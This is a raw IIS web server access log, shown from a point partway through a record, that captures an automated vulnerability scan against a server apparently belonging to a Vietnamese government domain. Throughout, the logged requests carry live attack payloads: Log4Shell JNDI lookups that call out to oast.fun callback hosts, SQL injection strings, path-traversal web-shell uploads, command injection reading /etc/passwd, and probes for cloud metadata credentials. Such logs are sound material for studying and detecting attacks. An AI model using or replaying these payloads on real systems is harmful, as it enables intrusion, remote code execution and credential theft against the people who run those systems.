pageNo=1&pageSize=10&accessToken=eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6OTk5OTk5OTk5OTl9.-isk56R8NfioHVYmpj4oz92nUteNBCN3HRd0-Hfk76g 443 - 95.111.241.172 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/54.0.2866.71+Safari/537.36 - 200 0 0 204 2023-10-24 05:22:36 103.153.214.94 GET /web/database/manager - 443 - 95.111.241.172 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 200 0 0 203 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2023-10-24 05:39:04 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2023-10-24 05:39:04 103.153.214.94 GET /account/register - 443 - 95.111.241.172 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 200 0 0 211 2023-10-24 05:41:02 103.153.214.94 GET /js/elfinder.min.js - 443 - 95.111.241.172 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/54.0.2866.71+Safari/537.36 - 200 0 0 206 2023-10-24 05:42:32 103.153.214.94 GET /ODswUD - 443 - 95.111.241.172 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 200 0 0 205 2023-10-24 05:42:35 103.153.214.94 GET /heapdump - 443 - 95.111.241.172 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.1916.47+Safari/537.36 - 200 0 0 629 2023-10-24 05:42:35 103.153.214.94 GET /actuator/heapdump - 443 - 95.111.241.172 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2309.372+Safari/537.36 - 200 0 0 202 2023-10-24 05:43:07 103.153.214.94 GET /latest/meta-data/identity-credentials/ec2/security-credentials/ec2-instance - 443 - 95.111.241.172 - - 200 0 0 205 2023-10-24 05:44:34 103.153.214.94 POST /jars/upload - 443 - 95.111.241.172 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/55.0.2919.83+Safari/537.36 - 405 0 1 205 2023-10-24 05:48:28 103.153.214.94 GET /webtools/control/main - 443 - 95.111.241.172 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.36 - 200 0 0 209 2023-10-24 05:57:34 103.153.214.94 GET /solr/admin/collections action=%24%7Bjndi%3Aldap%3A%2F%2F%24%7B%3A-604%7D%24%7B%3A-755}%7D.%24%7BhostName%7D.uri.ckr701l02n34v9l7kpng3nsniqoqd3joh.oast.fun%2F%7D 443 - 95.111.241.172 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.93+Safari/537.36 - 200 0 0 952 2023-10-24 05:57:35 103.153.214.94 GET /solr/admin/cores action=%24%7Bjndi%3Aldap%3A%2F%2F%24%7B%3A-604%7D%24%7B%3A-755}%7D.%24%7BhostName%7D.uri.ckr701l02n34v9l7kpngw64seni8g3oyn.oast.fun%2F%7D 443 - 95.111.241.172 Mozilla/5.0+(Windows+NT+6.4;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 200 0 0 204 2023-10-24 05:59:18 103.153.214.94 POST /solr/gettingstarted_shard1_replica_n1/config - 443 - 95.111.241.172 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 405 0 1 206 2023-10-24 05:59:18 103.153.214.94 POST /solr/gettingstarted_shard2_replica_n1/debug/dump param=ContentStreams 443 - 95.111.241.172 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 - 405 0 1 203 2023-10-24 06:07:56 103.153.214.94 POST / - 443 - 95.111.241.172 Mozilla/5.0+(Windows+NT+4.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 https://bcvt.kontum.gov.vn 405 0 1 207 2023-10-24 06:12:03 103.153.214.94 POST /suite-auth/login - 443 - 95.111.241.172 Mozilla/5.0+(X11;+OpenBSD+i386)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36 - 405 0 1 205 2023-10-24 06:12:53 103.153.214.94 POST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx method=GetStoreWarehouseByStore 443 - 95.111.241.172 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 - 405 0 1 205 2023-10-24 06:13:15 103.153.214.94 POST /j_security_check - 443 - 95.111.241.172 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 https://bcvt.kontum.gov.vn 405 0 1 203 2023-10-24 06:14:05 103.153.214.94 POST /ccmadmin/j_security_check - 443 - 95.111.241.172 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 https://bcvt.kontum.gov.vn/ccmadmin/showHome.do 405 0 1 205 2023-10-24 06:14:20 103.153.214.94 PUT /PhoneBackup/2XAKR3j1f4TqXyogXoV530GsmHC.php - 443 - 95.111.241.172 AVAYA - 405 0 1 212 2023-10-24 06:14:20 103.153.214.94 GET /PhoneBackup/2XAKR3j1f4TqXyogXoV530GsmHC.php - 443 - 95.111.241.172 AVAYA - 200 0 0 203 2023-10-24 06:14:52 103.153.214.94 GET /c42api/v3/LoginConfiguration username=${jndi:ldap://${:-550}${:-657}.${hostName}.username.ckr701l02n34v9l7kpngxdtsx98cn8fex.oast.fun/test}&url=https://localhost 443 - 95.111.241.172 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/54.0.2866.71+Safari/537.36 - 200 0 0 205 2023-10-24 06:15:50 103.153.214.94 POST /runners/start - 443 - 95.111.241.172 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 405 0 1 204 2023-10-24 06:16:21 103.153.214.94 GET /member/ajax_membergroup.php action=post&membergroup=@`'`/*!50000Union+*/+/*!50000select+*/+md5(999999999)+--+@`'` 443 - 95.111.241.172 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.36 - 200 0 0 203 2023-10-24 06:17:04 103.153.214.94 GET /plus/flink.php dopost=save&c=cat%20/etc/passwd 443 - 95.111.241.172 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 <?php+"system"($c);die;/*ref 200 0 0 205 2023-10-24 06:19:50 103.153.214.94 POST / - 443 - 95.111.241.172 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 405 0 1 737 2023-10-24 06:23:04 103.153.214.94 POST / - 443 - 95.111.241.172 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.93+Safari/537.36 - 405 0 1 211 2023-10-24 06:23:40 103.153.214.94 POST / - 443 - 95.111.241.172 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.1916.47+Safari/537.36 - 405 0 1 208 2023-10-24 06:32:10 103.153.214.94 POST / - 443 - 95.111.241.172 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 - 405 0 1 210 2023-10-24 06:32:51 103.153.214.94 POST / - 443 - 95.111.241.172 Mozilla/5.0+(Windows+NT+6.4;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 405 0 1 212 2023-10-24 06:33:59 103.153.214.94 GET /jexws/jexws.jsp ppp=cat+%2Fetc%2Fpasswd 443 - 95.111.241.172 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.93+Safari/537.36 - 200 0 0 205 2023-10-24 06:34:02 103.153.214.94 GET /jexws4/jexws4.jsp ppp=cat+%2Fetc%2Fpasswd 443 - 95.111.241.172 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2309.372+Safari/537.36 - 200 0 0 203 2023-10-24 06:34:02 103.153.214.94 GET /jexinv4/jexinv4.jsp ppp=cat+%2Fetc%2Fpasswd 443 - 95.111.241.172 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/55.0.2919.83+Safari/537.36 - 200 0 0 202 2023-10-24 06:34:04 103.153.214.94 GET /jbossass/jbossass.jsp ppp=cat+%2Fetc%2Fpasswd 443 - 95.111.241.172 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/54.0.2866.71+Safari/537.36 - 200 0 0 205 2023-10-24 06:34:06 103.153.214.94 GET /jexws/jexws.jsp ppp=type+C%3A%2FWindows%2Fwin.ini 443 - 95.111.241.172 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.36 - 200 0 0 202 2023-10-24 06:34:08 103.153.214.94 GET /jexws4/jexws4.jsp ppp=type+C%3A%2FWindows%2Fwin.ini 443 - 95.111.241.172 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2117.157+Safari/537.36 - 200 0 0 203 2023-10-24 06:34:08 103.153.214.94 GET /jexinv4/jexinv4.jsp ppp=type+C%3A%2FWindows%2Fwin.ini 443 - 95.111.241.172 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 200 0 0 203 2023-10-24 06:34:09 103.153.214.94 GET /jbossass/jbossass.jsp ppp=type+C%3A%2FWindows%2Fwin.ini 443 - 95.111.241.172 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.93+Safari/537.36 - 200 0 0 202 2023-10-24 06:36:01 103.153.214.94 POST / - 443 - 95.111.241.172 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36 - 405 0 1 209 2023-10-24 06:36:34 103.153.214.94 POST / - 443 - 95.111.241.172 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 405 0 1 737 2023-10-24 06:38:34 103.153.214.94 GET /' - 443 - 95.111.241.172 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36 - 200 0 0 204 2023-10-24 06:39:19 103.153.214.94 GET /api/v1/repos/search limit=1 443 - 95.111.241.172 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.1+Safari/537.36 - 404 0 2 217 2023-10-24 06:40:39 103.153.214.94 POST /bic/ssoService/v1/applyCT - 443 - 95.111.241.172 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36 - 405 0 1 205 2023-10-24 06:40:44 103.153.214.94 GET /users/sign_in - 443 - 95.111.241.172 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 200 0 0 204 2023-10-24 06:40:59 103.153.214.94 POST /WebReport/ReportServer op=svginit&cmd=design_save_svg&filePath=chartmapsvg/../../../../WebReport/jmhtUe6D.jsp 443 - 95.111.241.172 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.93+Safari/537.36 - 405 0 1 207 2023-10-24 06:40:59 103.153.214.94 GET /WebReport/jmhtUe6D.jsp - 443 - 95.111.241.172 Mozilla/5.0+(Windows+NT+4.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 200 0 0 202 2023-10-24 06:41:32 103.153.214.94 POST /eps/api/resourceOperations/upload token=0123F33B51E556F2FAEEAB90598B1A88 443 - 95.111.241.172 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 - 405 0 1 204 2023-10-24 06:42:10 103.153.214.94 POST /eps/resourceOperations/upload.action - 443 - 95.111.241.172 MicroMessenger - 405 0 1 204 2023-10-24 06:46:38 103.153.214.94 POST / - 443 - 95.111.241.172 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 - 405 0 1 839 2023-10-24 06:46:38 103.153.214.94 POST / - 443 - 95.111.241.172 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 405 0 1 203 2023-10-24 06:46:39 103.153.214.94 POST / - 443 - 95.111.241.172 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 - 405 0 1 204 2023-10-24 06:48:51 103.153.214.94 POST / - 443 - 95.111.241.172 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2117.157+Safari/537.36 https://bcvt.kontum.gov.vn 405 0 1 209 2023-10-24 06:51:50 103.153.214.94 GET /script/ - 443 - 95.111.241.172 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 205 2023-10-24 06:51:51 103.153.214.94 GET /jenkins/script - 443 - 95.111.241.172 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 200 0 0 203 2023-10-24 06:52:50 103.153.214.94 POST /sys/ui/extend/varkind/custom.jsp - 443 - 95.111.241.172 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 405 0 1 206 2023-10-24 06:55:17 103.153.214.94 GET / - 443 - 95.111.241.172 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36 - 200 0 0 212 2023-10-24 06:58:16 103.153.214.94 POST /plugin/add - 443 - 95.111.241.172 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/55.0.2919.83+Safari/537.36 - 405 0 1 206 2023-10-24 06:58:16 103.153.214.94 POST /plugin/customMethod - 443 - 95.111.241.172 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 405 0 1 203 2023-10-24 07:01:23 103.153.214.94 POST /mifs/j_spring_security_check - 443 - 95.111.241.172 Mozilla/5.0+(X11;+OpenBSD+i386)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36 https://bcvt.kontum.gov.vn/mifs/user/login.jsp 405 0 1 782 2023-10-24 07:01:41 103.153.214.94 GET /data/manage/cmd.php cmd=id 443 - 95.111.241.172 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 200 0 0 205 2023-10-24 07:02:09 103.153.214.94 POST /ocpu/library/base/R/do.call/json - 443 - 95.111.241.172 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36 - 405 0 1 808 2023-10-24 07:05:27 103.153.214.94 GET /index.php m&c=AjaxPersonal&a=company_focus&company_id[0]=match&company_id[1][0]=test")+and+extractvalue(1,concat(0x7e,md5(999999999)))+--+a 443 - 95.111.241.172 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 200 0 0 205 2023-10-24 07:08:03 103.153.214.94 GET /OA_HTML/jsp/bsc/bscpgraph.jsp ifl=/etc/&ifn=passwd 443 - 95.111.241.172 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36 - 200 0 0 209 2023-10-24 07:08:33 103.153.214.94 POST /.antproxy.php - 443 - 95.111.241.172 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2762.73+Safari/537.36 - 405 0 1 204 2023-10-24 07:09:02 103.153.214.94 GET /author_posts.php author=admin%27%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(md5(999999999),1,1),NULL,NULL,NULL,NULL--%20-&p_id=1 443 - 95.111.241.172 Mozilla/5.0+(X11;+OpenBSD+i386)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36 - 200 0 0 208 2023-10-24 07:09:03 103.153.214.94 GET /cms/author_posts.php author=admin%27%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(md5(999999999),1,1),NULL,NULL,NULL,NULL--%20-&p_id=1 443 - 95.111.241.172 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36 - 200 0 0 203 2023-10-24 07:09:04 103.153.214.94 DELETE /druid/coordinator/v1/lookups/config/${jndi:ldap:/ckr701l02n34v9l7kpngz7f1rtwqy993x.oast.fun/tea} - 443 - 95.111.241.172 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.1916.47+Safari/537.36 - 405 0 1 203 2023-10-24 07:11:21 103.153.214.94 POST /admin/ajax.php action=login 443 - 95.111.241.172 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36 - 405 0 1 210 2023-10-24 07:11:22 103.153.214.94 GET /admin/index.php page=home 443 - 95.111.241.172 Mozilla/5.0+(Windows+NT+6.2;+WOW64)+AppleWebKit/537.36+(KHTML+like+Gecko)+Chrome/44.0.2403.155+Safari/537.36 - 301 0 0 204 2023-10-24 07:11:58 103.153.214.94 GET /db_dump.php - 443 - 95.111.241.172 Mozilla/5.0+(Windows+NT+6.4;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 https://bcvt.kontum.gov.vn/user_add.php 200 0 0 204 2023-10-24 07:13:29 103.153.214.94 POST /main/inc/ajax/extra_field.ajax.php a=search_options_from_tags 443 - 95.111.241.172 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/54.0.2866.71+Safari/537.36 - 405 0 1 206 2023-10-24 07:13:29 103.153.214.94 POST /main/inc/ajax/extra_field.ajax.php a=search_options_from_tags 443 - 95.111.241.172 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 405 0 1 203 2023-10-24 07:17:16 103.153.214.94 GET /overview.asp - 443 - 95.111.241.172 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 205 2023-10-24 07:19:39 103.153.214.94 POST /index.php - 443 - 95.111.241.172 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/55.0.2919.83+Safari/537.36 - 405 0 1 204 2023-10-24 07:20:58 103.153.214.94 POST /Upload/upload_file.php l=test 443 - 95.111.241.172 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36 - 405 0 1 205 2023-10-24 07:21:00 103.153.214.94 GET /Upload/test/2XAKQgroAZRXg1O4IVTLsE5cpGB.php - 443 - 95.111.241.172 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/54.0.2866.71+Safari/537.36 - 200 0 0 203 2023-10-24 07:21:34 103.153.214.94 GET /metadata/v1.json - 443 - 95.111.241.172 - - 200 0 0 204 2023-10-24 07:26:59 103.153.214.94 GET /user/City_ajax.aspx CityId=33'union%20select%20sys.fn_sqlvarbasetostr(HashBytes('MD5','2XAKRTrUEDL8llcXzoqwOtGgX22')),2-- 443 - 95.111.241.172 Mozilla/5.0+(Windows+NT+4.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 200 0 0 206 2023-10-24 07:27:35 103.153.214.94 GET /duomiphp/ajax.php action=addfav&id=1&uid=1%20and%20extractvalue(1,concat_ws(1,1,md5(999999999))) 443 - 95.111.241.172 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 200 0 0 205 2023-10-24 07:27:41 103.153.214.94 GET /showfile.php file=/etc/passwd 443 - 95.111.241.172 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2117.157+Safari/537.36 - 200 0 0 203 2023-10-24 07:28:33 103.153.214.94 POST /cgi-bin/logo_extra_upload.cgi - 443 - 95.111.241.172 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.1916.47+Safari/537.36 - 405 0 1 206 2023-10-24 07:28:33 103.153.214.94 GET /logo/2XAKReR8ewv0gm5rFEIgoIAPsVU.txt - 443 - 95.111.241.172 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1847.137+Safari/4E423F - 200 0 0 205 2023-10-24 07:30:30 103.153.214.94 GET /user.php act=login 443 - 95.111.241.172 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36 554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:"num";s:72:"0,1+procedure+analyse(extractvalue(rand(),concat(0x7e,version())),1)--+-";s:2:"id";i:1;} 200 0 0 208 2023-10-24 07:30:30 103.153.214.94 GET /user.php act=login 443 - 95.111.241.172 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36 554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:"num";s:107:"*/SELECT+1,0x2d312720554e494f4e2f2a,2,4,5,6,7,8,0x7b24617364275d3b706870696e666f0928293b2f2f7d787878,10--+-";s:2:"id";s:11:"-1'+UNION/*";}554fcae493e564ee0dc75bdf2ebf94ca 200 0 0 204 2023-10-24 07:31:48 103.153.214.94 GET /_search a=$%7Bjndi%3Aldap%3A%2F%2F$%7B%3A-583%7D$%7B%3A-786%7D.$%7BhostName%7D.search.ckr701l02n34v9l7kpngnju4sup84xi47.oast.fun%7D 443 - 95.111.241.172 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36 - 200 0 0 206 2023-10-24 07:35:47 103.153.214.94 POST /process/aprocess.php - 443 - 95.111.241.172 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2309.372+Safari/537.36 - 405 0 1 206 2023-10-24 07:38:44 103.153.214.94 GET /upload/mobile/index.php c=category&a=asynclist&price_max=1.0%20AND%20(SELECT%201%20FROM(SELECT%20COUNT(*),CONCAT(0x7e,md5(999999999),0x7e,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)'' 443 - 95.111.241.172 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 - 200 0 0 209 2023-10-24 07:38:52 103.153.214.94 GET /index.php c=api&m=data2&auth=582f27d140497a9d8f048ca085b111df¶m=action=sql%20sql=%27select%20md5(999999999)%27 443 - 95.111.241.172 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.36 - 200 0 0 203 2023-10-24 07:42:44 103.153.214.94 GET /goanywhere/auth/Login.xhtml - 443 - 95.111.241.172 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 708 2023-10-24 07:43:23 103.153.214.94 POST /login/dologin - 443 - 95.111.241.172 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 405 0 1 209 2023-10-24 07:43:23 103.153.214.94 POST /res.php - 443 - 95.111.241.172 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 405 0 1 203 2023-10-24 07:44:20 103.153.214.94 POST /api/system/sessions - 443 - 95.111.241.172 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 https://bcvt.kontum.gov.vn 404 0 2 221 2023-10-24 07:49:39 103.153.214.94 POST /cas/fileUpload/upload token=/../../../../../var/lib/tomcat8/webapps/cas/js/lib/buttons/aFEmp.jsp&name=222" 443 - 95.111.241.172 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1866.237+Safari/537.36 - 405 0 1 207 2023-10-24 07:49:41 103.153.214.94 GET /cas/js/lib/buttons/aFEmp.jsp - 443 - 95.111.241.172 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.36 - 200 0 0 205 2023-10-24 07:52:34 103.153.214.94 PUT /v1/agent/service/register - 443 - 95.111.241.172 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1847.137+Safari/4E423F - 405 0 1 207 2023-10-24 07:52:39 103.153.214.94 POST /v2/query - 443 - 95.111.241.172 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 405 0 1 205 2023-10-24 07:53:43 103.153.214.94 POST /bic/ssoService/v1/applyCT - 443 - 95.111.241.172 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 405 0 1 1915 2023-10-24 07:54:01 103.153.214.94 POST /imc/javax.faces.resource/dynamiccontent.properties.xhtml - 443 - 95.111.241.172 